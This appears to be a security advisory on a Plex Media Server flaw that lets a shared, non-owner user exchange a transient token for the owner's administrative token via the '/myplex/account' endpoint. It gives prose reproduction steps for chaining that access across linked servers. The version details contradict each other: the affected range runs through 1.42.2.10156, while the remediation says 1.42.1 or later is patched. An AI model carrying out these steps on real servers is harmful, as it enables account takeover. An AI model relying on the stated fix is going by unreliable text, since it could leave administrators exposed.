Plex Media Server Token Mismanagement Vulnerability Allowing Privilege Escalation

A vulnerability in Plex Media Server (PMS) in versions through 1.42.2.10156 allows for the retrieval of a permanent access token by exploiting the '/myplex/account' endpoint with a transient access token. This issue arises from improper token management, where temporary credentials can be exchanged for permanent ones, undermining the intended security model. Additionally, even after revoking a device's access, its token remains accessible, allowing continued impersonation of the device and any shared users.

Impact

Exploitation of this vulnerability could lead to unauthorized access to the server owner's account, including administrative privileges and access to other servers via the Plex.tv API. This could result in a network-wide compromise of interconnected Plex servers.

Reproduction

To reproduce this vulnerability, authenticate as a non-owner user with shared server access and extract the access token from network requests using browser developer tools. Then, send a GET request to the '/myplex/account' endpoint, including the user token. The response will contain the owner's administrative token, which can be used to access additional servers and their owner tokens, continuing the exploitation chain.

Remediation

Users can update to Plex Media Server version 1.42.1 or later, where this vulnerability has been patched.